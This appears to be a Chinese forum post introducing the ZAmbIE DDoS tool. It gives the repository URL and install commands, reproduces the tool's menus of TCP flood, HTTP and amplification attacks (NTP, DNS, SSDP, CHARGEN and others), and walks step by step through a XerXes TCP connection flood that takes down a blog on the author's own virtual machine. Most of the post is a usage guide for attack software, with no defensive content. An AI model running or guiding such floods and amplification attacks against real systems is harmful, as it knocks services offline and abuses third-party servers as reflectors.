DDos攻击工具ZAmbIE

项目主页:ZAmbIE

安装

git clone https://github.com/zanyarjamal/zambie.git 

chmod -R 777 zambie 

cd zambie 

./Installer.sh 

./zambie.py 

启动如果出现报错moudle termcolor not found

执行

pip install  termcolor

运行

./zambie.py 
    ___________________________________________________________________
    |                                                                   |
    |    /$$$$$$$$  /$$$$$$                /$$      /$$$$$$ /$$$$$$$$   |
    |   |_____ $$  /$$__  $$              | $$     |_  $$_/| $$_____/   |
    |        /$$/ | $$  \ $$ /$$$$$$/$$$$ | $$$$$$$  | $$  | $$         |
    |       /$$/  | $$$$$$$$| $$_  $$_  $$| $$__  $$ | $$  | $$$$$      |
    |      /$$/   | $$  | $$| $$ \ $$ \ $$| $$  \ $$ | $$  | $$__/      |
    |     /$$/    | $$  | $$| $$ | $$ | $$| $$  | $$ | $$  | $$         |
    |    /$$$$$$$$| $$  | $$| $$ | $$ | $$| $$$$$$$//$$$$$$| $$$$$$$$   |
    |   |________/|__/  |__/|__/ |__/ |__/|_______/|______/|________/   |
    |                                                           V1.O    |
    |______________________[MADE BY LUNATI[C2]]_________________________|

    1:. DDoS Attacks

    99:. Quit

    $: 

输入1回车进行DDos攻击

            |     /$$$$$$$  /$$$$$$$  Layer[4/7] /$$$$$$     |  
     -------|    | $$__  $$| $$__  $$           /$$__  $$    |-------
            |    | $$  \ $$| $$  \ $$  /$$$$$$ | $$  \__/    | 
            |    | $$  | $$| $$  | $$ /$$__  $$|  $$$$$$     | 
     -------|    | $$  | $$| $$  | $$| $$  \ $$ \____  $$    |------- 
            |    | $$  | $$| $$  | $$| $$  | $$ /$$  \ $$    | 
            |    | $$$$$$$/| $$$$$$$/|  $$$$$$/|  $$$$$$/    | 
     -------|    |_______/ |_______/  \______/  \______/     |-------
            |____________[DDoS Script Collection]____________|

 
     1:. TCP Connection Flood
     2:. HTTP Attacks
     3:. NTP AMP Attack
     4:. DNS AMP Attack
     5:. SSDP AMP Attack
     6:. DOMINATE
     7:. CHARGEN AMP Attacks
     8:. SUDP AMP Attack
     9:. QUAKE AMP Attacks
     10:. TS3 AMP Attacks

     99:. Go Back

     $: 

有10种不同的攻击方式

测试TCP洪水攻击

目标为虚拟机中docker搭建的typecho博客

终端输入1选择TCP Connection Flood


     1:.  XerXes

     99:. Go Back

     $: 

然后输入1选择XerXes(薛西斯大帝?)

     |    /$$   /$$  /$$$$$$   /$$$$$$  /$$   /$$  /$$$$$$   /$$$$$$$  |
     |   |  $$ /$$/ /$$__  $$ /$$__  $$|  $$ /$$/ /$$__  $$ /$$_____/  |
     |    \  $$$$/ | $$$$$$$$| $$  \__/ \  $$$$/ | $$$$$$$$|  $$$$$$   |
     |     >$$  $$ | $$_____/| $$        >$$  $$ | $$_____/ \____  $$  |
     |    /$$/\  $$|  $$$$$$$| $$       /$$/\  $$|  $$$$$$$ /$$$$$$$/  |
     |   |__/  \__/ \_______/|__/      |__/  \__/ \_______/|_______/   |
     |_________________________________________________________________| 
      ______________________{IT CAN DO THE TRICK}______________________

     Domain: 192.168.114.132
     Port: 8080


设置目标ip/域名和端口

回车启动攻击

访问网站已经down了

服务器执行netstat -ant可见建立大量链接

2 个赞

服务器资源由ZeptoVM赞助

Partners Wiki Discord